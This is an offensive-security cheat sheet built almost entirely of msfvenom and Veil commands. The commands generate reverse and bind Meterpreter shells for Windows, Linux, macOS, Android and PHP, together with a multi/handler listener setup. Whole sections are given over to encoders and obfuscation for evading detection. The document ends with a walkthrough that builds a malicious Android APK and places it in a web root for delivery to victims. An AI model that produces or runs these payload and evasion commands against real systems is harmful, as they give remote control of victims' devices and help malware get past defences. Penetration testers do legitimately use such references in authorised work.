MSFVENOM Quick Reference



1. Basics

# List all encoders
msfvenom --list encoders

# List all payloads
msfvenom --list payloads

# Encoded Meterpreter reverse TCP payload for Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe -o encodedevil.exe

# Meterpreter reverse TCP payload for Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf -o reverse.elf

Catching the shell

# Start Win Meterpreter Listener (LHOST/LPORT must match the values used when generating the payload)
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP_ADDRESS>
set LPORT <PORT>
run


- credit netmux

2. Target OS

MSFVENOM Payloads

# Windows Reverse TCP Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe -o reverse_meterpreter.exe

# Linux Reverse TCP Meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f elf -o reverse_meterpreter.elf

# macOS Reverse TCP Shell (osx/x86/shell_reverse_tcp is a plain shell, not Meterpreter)
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o reverse_shell.macho

# Android Reverse TCP Meterpreter
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -o reverse_meterpreter.apk

# PHP Reverse TCP Meterpreter
msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o reverse_shell.php

# Generate a Windows x86 reverse shell payload in the Powershell format
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f powershell -o reverse_shell.ps1

# Generate a Linux x86 bind shell payload in the Python format
msfvenom -p linux/x86/shell/bind_tcp LPORT=<attacker port> -f python -o bind_shell.py

# Generate a macOS x86 reverse TCP Meterpreter payload that connects through an HTTP proxy
msfvenom -p osx/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o reverse_meterpreter.macho HTTP_PROXY=http://proxy.example.com:8080

# Generate a Windows x64 reverse HTTPS Meterpreter payload that encrypts communications with RC4
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=<attacker port> -f exe -o reverse_meterpreter.exe ENCODING=rc4

3. With Veil Framework

# Veil Framework 'apt install veil'

PYTHON

# Generate a custom payload with a specific name and set of evasion techniques
python Veil.py -p python/meterpreter/rev_http -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -H 5'

# Generate a payload with a custom shellcode encoder
python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-x alpha_mixed'

# Generate a payload with custom obfuscation options
python Veil.py -p python/meterpreter/reverse_tcp -o my_payload -t python -c '-t PS -Obfuscate true -ObfuscationType 3 -OutDirectory /root/veil/payloads/obfuscated'

WIN CMD

# Generate a payload with an encrypted communication channel
python Veil.py -p python/meterpreter/rev_tcp -o my_payload -t python -c '-e x86/shikata_ga_nai -o raw -C <attacker IP>:<attacker port>'

# Generate a Windows payload with a custom shellcode encoder
python.exe Veil.py -p windows/meterpreter/reverse_tcp -o my_payload -t exe -c "-e x86/shikata_ga_nai -o raw -H 5"

# Generate a Windows payload with custom obfuscation options
python.exe Veil.py -p windows/meterpreter/reverse_tcp -o my_payload -t exe -c "-x alpha_mixed"

# Generate a Windows payload with an encrypted communication channel
python.exe Veil.py -p windows/meterpreter/reverse_tcp -o my_payload -t exe -c "-e x86/shikata_ga_nai -o raw -C <attacker IP>:<attacker port>"

4. Staged & Non-Staged by OS (Metasploit naming: a slash before the stage name, e.g. meterpreter/reverse_tcp, is staged; an underscore, e.g. meterpreter_reverse_tcp, is non-staged)

# Windows x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 -f exe -o encodedevil.exe`

# Windows x86 Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 3 -a x86 --platform windows -f exe --smallest -o encodedevil.exe`

# Windows x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f exe -o encodedevil.exe`

# Windows x64 Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f exe -o encodedevil.exe`

# Linux x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf -o reverse.elf`

# Linux x86 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -f elf --smallest -o reverse.elf`

# Linux x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -f elf -o reverse.elf`

# Linux x64 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -f elf --smallest -o reverse.elf`

5. Obfuscated and encoded

# Windows x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/call4_dword_xor -i 3 -f exe -o encodedevil.exe`

# Windows x86 Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -a x86 --platform windows -f exe --smallest -o encodedevil.exe`

# Windows x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_dynamic -i 3 -f exe -o encodedevil.exe`

# Windows x64 Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_dynamic -i 3 -f exe -o encodedevil.exe`

# Linux x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/call4_dword_xor -i 3 -f elf -o reverse.elf`

# Linux x86 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x86/shikata_ga_nai -i 5 -f elf --smallest -o reverse.elf`

# Linux x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_context -i 3 -f elf -o reverse.elf`

# Linux x64 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x64/xor_context -i 3 -f elf --smallest -o reverse.elf`

6. Other possible detection-evasion payloads

# Windows x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/alpha_mixed -i 5 -f exe -o encodedevil.exe`

# Windows x86 Staged Meterpreter Reverse TCP
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/alpha_upper -i 3 -a x86 --platform windows -f exe --smallest -o encodedevil.exe`

# Windows x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/zutto_dekiru -i 3 -f exe -o encodedevil.exe`

# Windows x64 Staged Meterpreter Reverse TCP
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/zutto_dekiru -i 3 -f exe -o encodedevil.exe`

# Linux x86 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x86/alpha_mixed -i 5 -f elf -o reverse.elf`

# Linux x86 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x86/alpha_upper -i 3 -f elf --smallest -o reverse.elf`

# Linux x64 Non-Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> -e x64/xor_context -i 3 -f elf -o reverse.elf`

# Linux x64 Staged Meterpreter Reverse TCP
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP_ADDRESS> LPORT=<PORT> --platform linux -e x64/xor_context -i 3 -f elf --smallest -o reverse.elf`

Example: Generating a Payload with msfvenom

First, start Kali Linux so that we can generate an apk file as a malicious payload. We need to check our local IP, which turns out to be 192.xxx.x.xxx. You can also reach an Android device over the Internet by using your public/external IP as LHOST together with port forwarding.

After getting your local host IP, use the msfvenom tool, which will generate a payload to penetrate the Android device.

Type command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk

Where:
- -p indicates the payload type
- android/meterpreter/reverse_tcp specifies that a reverse Meterpreter shell will come in from the target Android device
- LHOST is your local IP
- LPORT is set as the listening port
- R> /var/www/html writes the raw output directly into the Apache web root
- ehacking.apk is the name of the final output

This takes some time and produces an apk file of almost ten thousand bytes.